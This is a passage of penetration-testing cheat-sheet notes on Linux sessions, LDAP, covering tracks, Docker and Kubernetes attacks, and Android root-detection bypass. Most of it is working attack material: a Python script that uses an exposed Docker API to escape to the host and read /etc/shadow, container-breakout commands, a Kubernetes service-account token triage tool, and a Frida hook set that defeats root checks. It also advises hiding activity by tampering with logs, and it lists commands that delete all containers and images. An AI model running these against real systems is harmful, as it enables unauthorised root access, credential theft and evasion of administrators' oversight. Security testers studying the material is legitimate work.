* echo "msg" > /dev/pts/<pts-number> `send message to specific user`<br />
* wall msg `broadcast message to everyone`<br />
### Closing Session (Windows)
* quser
* logoff id|user_name
# LDAP
```
ldapsearch -x -LLL -h localhost -D 'cn=USER,ou=users,dc=domain,dc=com' -w PASSWORD -b "dc=domain,dc=com"
```
# Covering Tracks
The final stages of penetration testing involve setting up persistence and covering our tracks. Here we detail the latter, as it is not mentioned nearly enough.
During a pentesting engagement, you will want to try to avoid detection by the administrators and engineers of your client wherever the permitted scope allows. Activities such as logging in, authentication and uploading/downloading files are logged by services and the system itself.
On Debian and Ubuntu, the majority of these are kept within the `/var/log` directory and often require administrative privileges to read and modify. Some log files of interest:
* `/var/log/auth.log` (attempted logins for SSH, changes to or logging in as system users)
* `/var/log/syslog` (system events such as firewall alerts)
* `/var/log/<service>/`, for example the access logs of apache2: `/var/log/apache2/access.log`
# Docker
If the Docker daemon is exposed on TCP port 2375 (plain HTTP, no authentication) the `docker` client can drive it remotely with `-H`. To list the images on the remote machine <br />
`docker -H <ip>:2375 images` <br />
To list all containers on the remote machine, including stopped ones <br />
`docker -H <ip>:2375 ps -a` <br />
To get a shell inside a container that is already running <br />
`docker -H <ip>:2375 exec -it <container-id> /bin/sh` <br />
To start a new container from an image name and tag with the host filesystem mounted, then chroot into it (this is root on the host) <br />
`docker -H <ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh` <br />
The same with a different mount point and whatever image is already present on the daemon (`images` above tells you which; nothing is pulled if the host has no internet) <br />
`docker -H tcp://<ip>:2375 run --rm -it -v /:/host <image_name> chroot /host bash` <br />
If `/var/run/docker.sock` is mounted inside the container you already have, upload a static docker binary and talk to the socket; the result is the same host-level access <br />
`./docker -H unix:///var/run/docker.sock images` <br />
`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host` <br />
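Added example (not from the original notes): the `docker run -v /:/host IMAGE chroot /host ...` trick above, done over the Docker Engine HTTP API with only Python, for a box that has no docker client. The target address 192.0.2.10 and the image name are assumptions; the image has to exist on the daemon already (check `list_images()` first) because nothing is pulled.

```python
import json
import urllib.request

DOCKER_API = "http://192.0.2.10:2375"   # assumed target (TEST-NET address)


def _request(method, path, body=None):
    """One call to the Engine API; returns the raw response body."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(DOCKER_API + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def list_images():
    """Equivalent of `docker images`: the RepoTags of every image on the daemon."""
    tags = []
    for img in json.loads(_request("GET", "/images/json")):
        tags.extend(img.get("RepoTags") or [])
    return tags


def host_escape_spec(image, host_cmd):
    """Container spec equal to `docker run -v /:/host IMAGE chroot /host /bin/sh -c CMD`.
    Tty=True makes the /logs endpoint return a raw stream instead of 8-byte-framed chunks."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/host", "/bin/sh", "-c", host_cmd],
        "Tty": True,
        "HostConfig": {"Binds": ["/:/host"]},
    }


def run_on_host(image, host_cmd):
    """Create, start and wait for the container, collect its output, then delete it."""
    created = json.loads(_request("POST", "/containers/create",
                                  host_escape_spec(image, host_cmd)))
    cid = created["Id"]
    _request("POST", f"/containers/{cid}/start")
    _request("POST", f"/containers/{cid}/wait")
    out = _request("GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    _request("DELETE", f"/containers/{cid}?force=1")
    return out.decode(errors="replace")


if __name__ == "__main__":
    print("images:", list_images())
    print(run_on_host("alpine:3.9", "id; hostname; head -3 /etc/shadow"))
```

`HostConfig.Binds` is exactly what `-v /:/host` turns into, so the same JSON works with `curl --unix-socket /var/run/docker.sock` against a mounted socket when you cannot upload a binary.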
Remove all docker images <br />
`docker rmi $(docker images -q)` <br />
Stop and remove all containers (`docker stop` only stops them, and `-q` prints just the IDs, which is what `$(...)` needs) <br />
`docker stop $(docker ps -aq)` <br />
`docker rm $(docker ps -aq)` <br />
## Docker Breakout/Exploits
* In a privileged container (`--privileged`) `fdisk -l` shows the host's disks; mount the host root filesystem and you are out <br />
`mkdir -p /mnt/host && mount /dev/sda<x> /mnt/host`
* Check the container's capabilities with `capsh --print` (or decode the `CapEff` line in `/proc/self/status`). `SYS_MODULE` lets you load a kernel module into the host kernel, `SYS_ADMIN` lets you mount and abuse cgroups:
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
* The runc breakout CVE-2019-5736 overwrites the host's `runc` binary through `/proc/self/exe` when someone runs `docker exec` into the container; it only works on unpatched runc (< 1.0-rc6, Docker < 18.09.2)
https://github.com/Frichetten/CVE-2019-5736-PoC
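Added example (not from the original notes): decoding `CapEff` from `/proc/self/status` in Python gives the same information as `capsh --print` without needing `capsh` in the image. The bit numbers are from `linux/capability.h`; the list of capabilities worth abusing is my own selection, and the two sample masks (Docker's default set, and a `--privileged` container on a kernel with 38 capabilities) are constructed.

```python
# Capability names in bit order, from linux/capability.h
CAPABILITIES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities outside Docker's default set that open a breakout path (assumed notes)
DANGEROUS = {
    "sys_admin": "mount(), cgroup release_agent escape, many other paths",
    "sys_module": "load a kernel module into the host kernel",
    "sys_ptrace": "ptrace host processes when the pid namespace is shared",
    "dac_read_search": "open_by_handle_at() to read host files (Shocker)",
    "sys_rawio": "raw access to block devices",
    "net_admin": "reconfigure networking, sniff or redirect traffic",
    "sys_boot": "reboot the host",
}

DEFAULT_DOCKER_CAPEFF = "00000000a80425fb"   # stock `docker run`, no --cap-add
PRIVILEGED_CAPEFF = "0000003fffffffff"       # `docker run --privileged`, 38-capability kernel


def decode_capeff(hex_mask):
    """Set of capability names whose bit is set in the hex mask."""
    mask = int(hex_mask, 16)
    return {name for bit, name in enumerate(CAPABILITIES) if mask >> bit & 1}


def dangerous_caps(hex_mask):
    """Subset of decode_capeff() worth trying to abuse, mapped to the reason."""
    return {c: DANGEROUS[c] for c in decode_capeff(hex_mask) if c in DANGEROUS}


def capeff_from_status(status_text):
    """Pull the CapEff value out of /proc/<pid>/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("no CapEff line")


if __name__ == "__main__":
    with open("/proc/self/status") as fh:
        mask = capeff_from_status(fh.read())
    print("effective:", ", ".join(sorted(decode_capeff(mask))))
    for cap, why in dangerous_caps(mask).items():
        print(f"[!] {cap}: {why}")
```

Run it inside the container as the user you landed as; `CapEff` is per process, so a setuid helper or a different user may have a different set.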
# Kubernetes
## Basic Commands
### List the pods in the current namespace
`kubectl get pods`
### List the namespaces, which partition the cluster
`kubectl get namespaces`
### List the pods in a specific namespace
`kubectl get pods -n <namespace_name>`
### List secrets (service account tokens live here; `-A` covers every namespace)
`kubectl get secrets -n kube-system`
### Get information about a secret
`kubectl describe secret <secret_name> -n <namespace_name>`
### Dump a pod's full spec (service account, mounted volumes, image, securityContext)
`kubectl get -o json pod <pod_name> -n <namespace_name>`
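Added example (not from the original notes): `kubectl get secret NAME -n NS -o json` prints the `data` values base64-encoded, and a service-account token inside is a JWT whose payload says which account and namespace it belongs to. This Python script decodes both so you know what a token is before trying it against the API server. `SAMPLE_SECRET` is constructed, with made-up names and a junk signature.

```python
import base64
import json


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _fake_jwt(payload):
    """header.payload.signature for the sample; the signature is junk, we never verify it."""
    header = b64url_encode(b'{"alg":"RS256","kid":"demo"}')
    return f"{header}.{b64url_encode(json.dumps(payload).encode())}.c2lnbmF0dXJl"


# Constructed sample in the shape of `kubectl get secret -o json` (not real data)
SAMPLE_SECRET = {
    "apiVersion": "v1", "kind": "Secret",
    "type": "kubernetes.io/service-account-token",
    "metadata": {"name": "default-token-abcde", "namespace": "kube-system"},
    "data": {
        "namespace": base64.b64encode(b"kube-system").decode(),
        "ca.crt": base64.b64encode(b"-----BEGIN CERTIFICATE-----\nMIIB...demo...\n"
                                   b"-----END CERTIFICATE-----\n").decode(),
        "token": base64.b64encode(_fake_jwt({
            "iss": "kubernetes/serviceaccount",
            "kubernetes.io/serviceaccount/namespace": "kube-system",
            "kubernetes.io/serviceaccount/secret.name": "default-token-abcde",
            "kubernetes.io/serviceaccount/service-account.name": "default",
            "sub": "system:serviceaccount:kube-system:default",
        }).encode()).decode(),
    },
}


def decode_secret(secret):
    """{field: decoded text} for every entry under .data"""
    return {k: base64.b64decode(v).decode("utf-8", errors="replace")
            for k, v in secret.get("data", {}).items()}


def jwt_claims(token):
    """Payload of a JWT, read without verifying the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(b64url_decode(parts[1]))


def triage_secret(secret):
    fields = decode_secret(secret)
    info = {"name": secret["metadata"]["name"], "type": secret.get("type"),
            "fields": sorted(fields)}
    token = fields.get("token")
    if token and token.count(".") == 2:
        c = jwt_claims(token)
        # legacy secret-based tokens use flat claims; bound tokens nest them under "kubernetes.io"
        nested = c.get("kubernetes.io", {})
        info["service_account"] = (c.get("kubernetes.io/serviceaccount/service-account.name")
                                   or nested.get("serviceaccount", {}).get("name"))
        info["namespace"] = c.get("kubernetes.io/serviceaccount/namespace") or nested.get("namespace")
        info["subject"] = c.get("sub")
        info["token"] = token
    return info


if __name__ == "__main__":
    import sys
    secret = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_SECRET
    t = triage_secret(secret)
    print(json.dumps({k: v for k, v in t.items() if k != "token"}, indent=2))
    if "token" in t:
        print(f"\nkubectl --token='{t['token']}' -n {t['namespace']} auth can-i --list")
```

Feed it with `kubectl get secret NAME -n NS -o json | python3 k8s_secret.py`; the `kubectl auth can-i --list` line it prints (add `--server` if no kubeconfig points at the cluster) shows what that token is actually allowed to do.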
## Creating Malicious Pods
https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf
https://github.com/BishopFox/badPods
# Android
## Using ADB
ADB (Android Debug Bridge) connects to Android devices and emulators from the command line and runs shell commands on them.
If only one device is connected (or you are using `Genymotion`), use
```
adb shell
```
If several devices are connected, first run `adb devices` to get the device ID (serial) and pick one with `-s`
```
adb -s DEVICE_ID shell
```
To install an APK through adb
```
adb install file.apk
```
To transfer a file to the device (`/data/local/tmp` is writable by the shell user and is the usual place for frida-server)
```
adb push file /data/local/tmp
```
## Root Detection Bypass
Some applications refuse to run on rooted devices. This can be bypassed with Frida, Objection, Xposed/EdXposed modules (RootCloak, unrootbeer) or Magisk (hiding root from selected apps).
### Using Frida
There are many scripts for bypassing root detection. A universal one (https://codeshare.frida.re/@dzonerzy/fridantiroot/) covers most checks but is unstable; a better version is at https://gist.github.com/pich4ya/0b2a8592d3c8d5df9c34b8d185d2ea35.
First start `frida-server` on the device (push it to `/data/local/tmp`, make it executable and run it as root), then run frida from the host: `-U` selects the USB device and `-f` spawns the package so the hooks are in place before the root check runs
```
frida --codeshare dzonerzy/fridantiroot -f com.packagename -U
```
### Objection
Objection is built on Frida and can disable root detection when the standalone scripts fail (run `android root disable` inside the explore session)
```
objection --gadget com.android.packagename explore
```
To list the activities in the application
```
android hooking list activities
```
To list the methods of a class, with their return types
```
android hooking list class_methods android_packagename.activity_name
```
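Added example (not from the original notes, and not the codeshare script): a small custom hook set driven from Python through Frida's bindings, for when the universal script is unstable. It hides su binaries from `File.exists`, fails `Runtime.exec` calls that look for `su`, and reports `test-keys` as `release-keys`, while sending back which checks the app actually made so you can extend the list. `PACKAGE` and `ROOT_PATHS` are assumptions; it needs `pip install frida frida-tools` and frida-server running on the device.

```python
import json
import sys

PACKAGE = "com.example.target"   # assumed package name

# Paths commonly probed by root checks (assumed list; add what the target asks for)
ROOT_PATHS = [
    "/system/bin/su", "/system/xbin/su", "/sbin/su", "/su/bin/su",
    "/system/app/Superuser.apk", "/system/xbin/busybox",
    "/data/adb/magisk", "/system/bin/.ext/.su",
]

HOOK_JS = r"""
Java.perform(function () {
    var ROOT_PATHS = __ROOT_PATHS__;
    var File = Java.use("java.io.File");
    File.exists.implementation = function () {
        var p = this.getAbsolutePath();
        if (ROOT_PATHS.indexOf(p) !== -1) {
            send({hook: "File.exists", arg: p});
            return false;                      // pretend the indicator is absent
        }
        return this.exists();
    };
    var Runtime = Java.use("java.lang.Runtime");
    var IOException = Java.use("java.io.IOException");
    function blocked(cmd) { return /(^|\/)su$|which su|getprop ro\.build\.tags/.test(cmd); }
    var execStr = Runtime.exec.overload("java.lang.String");
    execStr.implementation = function (cmd) {
        if (blocked(cmd)) { send({hook: "Runtime.exec", arg: cmd}); throw IOException.$new("not found"); }
        return execStr.call(this, cmd);
    };
    var execArr = Runtime.exec.overload("[Ljava.lang.String;");
    execArr.implementation = function (cmd) {
        var parts = [];
        for (var i = 0; i < cmd.length; i++) parts.push(cmd[i]);
        var joined = parts.join(" ");
        if (blocked(joined)) { send({hook: "Runtime.exec[]", arg: joined}); throw IOException.$new("not found"); }
        return execArr.call(this, cmd);
    };
    Java.use("android.os.Build").TAGS.value = "release-keys";   // many checks look for "test-keys"
});
"""


def build_script(paths=ROOT_PATHS):
    """Frida JS with the path list baked in as a JSON array."""
    return HOOK_JS.replace("__ROOT_PATHS__", json.dumps(paths))


def on_message(message, data, seen):
    """Collect (hook, argument) for every root check that fired."""
    if message.get("type") == "send":
        seen.append((message["payload"]["hook"], message["payload"]["arg"]))
    else:
        print(message, file=sys.stderr)


def main():
    import frida  # imported here so the rest of the file works without frida installed
    device = frida.get_usb_device(timeout=5)
    pid = device.spawn([PACKAGE])        # same as `frida -U -f PACKAGE`: hooks land before the check
    session = device.attach(pid)
    script = session.create_script(build_script())
    seen = []
    script.on("message", lambda m, d: on_message(m, d, seen))
    script.load()
    device.resume(pid)
    print("hooks loaded, Ctrl-C to stop", file=sys.stderr)
    try:
        sys.stdin.read()
    except KeyboardInterrupt:
        pass
    print("root checks intercepted:", sorted(set(seen)))


if __name__ == "__main__":
    main()
```

If the app still bails out, the messages it sent tell you which probe got through; native checks (`stat()` from a JNI library) need an `Interceptor.attach` on libc instead of Java hooks.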
## Logging
Applications sometimes log user input (credentials, tokens, request bodies); capture it with `adb logcat` while exercising the app and filter on the app's PID.
## Data stored on storage
Data saved by an Android application lives under `/data/data/<package_name>` (shared preferences, SQLite databases, cache); reading it needs root, or `run-as <package_name>` if the app is debuggable.
## SSL Pinning
## Intents
## Remote Code Execution